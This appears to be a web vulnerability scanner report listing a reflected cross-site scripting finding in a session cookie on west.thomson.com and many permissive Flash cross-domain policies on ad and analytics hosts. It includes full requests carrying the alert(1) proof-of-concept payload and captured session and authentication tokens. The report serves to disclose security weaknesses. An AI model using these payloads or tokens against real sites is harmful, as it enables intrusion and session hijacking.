Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn60c4d"-alert(1)-"00c0d436f58; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:14:14 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=A83903E346668B8C5013BE5A2EB7575E06E6174AF9897502A0511297BDE5772CD5739B7504B9636D9CAEC96C6DA8533B45F8114B4A355B5FBB4161156EB94B70E0092285E6DC5624C896D2C7A899C886D58A38D1EBC3B10AF21B1A1CC06FCA7B8D4FC1E4F6FAD2D71AF519A076A525C4A21977C46946A72C5C90CBE27C412B0892C5AC0DF5795D71CD24E07A3374D9B8BAF8F2D22A38AED03061A332EFE0F5DAC2DF39DA2FF6D8D7AB0999D34FE6268CCFABE09CE201B547180C78C622BE157C5ED94E721295227D0E5C510373DF475FE045B6C8723F56AE64718D2018C24F030DE48EED; path=/
Set-Cookie: ASP.NET_SessionId=jus41y0tsf20rcm5angb3jic; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
script'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("https://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn60c4d"-alert(1)-"00c0d436f58");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

5.266. https://west.thomson.com/support/customer-service/order-info.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /support/customer-service/order-info.aspx

Issue detail

The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa8a7"-alert(1)-"06f8a7e059a was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/customer-service/order-info.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwnfa8a7"-alert(1)-"06f8a7e059a; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:49:10 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=C8A7DE09B3F3861F70FCB3555ACE9840D9202DDE9EBB819AA85500F02BFF6F9D55779D389D088B87A4E9BF29CFC400B9FE2CE54E6044D128C138225BF6945D355F0BACA2E1D4D7AAAC1F3576CFA4AC277E610C68615CC9370728E5B8EF8AB2017B5D21A1572C3769BDB9B7BD4DB928D3C0BA2F89963BE729A6D8D445541D54E45EA1A2DD8A91A4C0DDF983DE210A88F739BA19018668DCEC2304E708BFCA1C6428330BD4FF72F5C7BB40014307C5DACC476D2A215A2847074FC74DF804B9C02E5427168C56C4747288318802465CE33C0C14A6C3842A09B88511063B79C77BD32F8FE2A9; expires=Tue, 26-Apr-2011 21:19:09 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=29F53BC63218850994E3F0D4570D9C26F17181BF64BC61BFD03823F69BBC62554495D65CF3F6A7DC3C3F40DC20C4B3A7CFF917081D59BB7F6B3502DABEACE769A4C8482A14173F148E6B7F8A7D470D88C0F64DFB829E80A7B7862EDC7100253D2670F90F1512D4517755B64FA9EEACC2B05329661605D462A722174020835679DEBDFA941C92396C10999E8914C163D1A09CC0D3D312850F5A283319716CE0F45B09B3EEDDA873FB3814FF7B305B3C6A8402A390E9559B902407DDDBB08570C3AD8B826043F175B23D20FCCF1EE63A292F278BD2CC217EFADE28B5468D240350F296FC7B; path=/
Set-Cookie: ASP.NET_SessionId=o3jyk5lvmj3ym1k2zahvm5lt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
script'>
var R3_COMMON = new r3_common();
R3_COMMON.setApiKey("756bd9ec9a083c52");
R3_COMMON.setBaseUrl("https://recs.richrelevance.com/rrserver/");
R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwnfa8a7"-alert(1)-"06f8a7e059a");
R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");


r3();
</script>
...[SNIP]...

6. Flash cross-domain policy  previous  next
There are 28 instances of this issue:


6.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Tue, 26 Apr 2011 18:36:13 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.2. http://amch.questionmarket.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:36:36 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=513
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

6.3. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:14 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.4. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 27 Apr 2011 18:36:33 GMT
Date: Tue, 26 Apr 2011 18:36:33 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.5. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 27 Apr 2011 18:36:16 GMT
Date: Tue, 26 Apr 2011 18:36:16 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.6. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 20:11:04 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


6.7. http://c.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.8. http://c.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.9. http://col.stc.s-msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://col.stc.s-msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: col.stc.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca01
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.msn.com" />
<allow-access-from domain="*"/>
...[SNIP]...

6.10. http://col.stj.s-msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://col.stj.s-msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: col.stj.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca04
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.msn.com" />
<allow-access-from domain="*"/>
...[SNIP]...

6.11. http://colstc.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://colstc.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: colstc.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca04
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:35 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.msn.com" />
<allow-access-from domain="*"/>
...[SNIP]...

6.12. http://colstj.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://colstj.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: colstj.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca04
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Content-Length: 224
Age: 1
Date: Tue, 26 Apr 2011 18:36:36 GMT
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Expires: Wed, 25 Apr 2012 18:36:35 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.msn.com" />
<allow-access-from domain="*"/>
...[SNIP]...

6.13. http://img.widgets.video.s-msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.widgets.video.s-msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.widgets.video.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "0514ecae5f2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 170
Age: 14270
Date: Tue, 26 Apr 2011 18:36:15 GMT
Last-Modified: Mon, 04 Apr 2011 16:31:46 GMT
Expires: Wed, 27 Apr 2011 14:38:25 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.14. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:58:44 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.15. http://omnituremarketing.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omnituremarketing.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1302288830000"
Accept-Ranges: bytes
Content-Length: 201
Date: Tue, 26 Apr 2011 20:58:56 GMT
Connection: close
Last-Modified: Fri, 08 Apr 2011 18:53:50 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.16. http://rad.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 18 Mar 2011 23:41:08 GMT
Accept-Ranges: bytes
ETag: "024af4c5e5cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:15 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.17. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Tue, 03 May 2011 18:29:24 GMT
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.18. http://ad.wsod.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:13 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "61f4da-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

6.19. http://api.bing.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 18:36:36 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-04-26T18%3a36%3a36; expires=Fri, 06-May-2011 18:36:36 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=B6AEB400DC4D4E248F334E741402ECE2; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
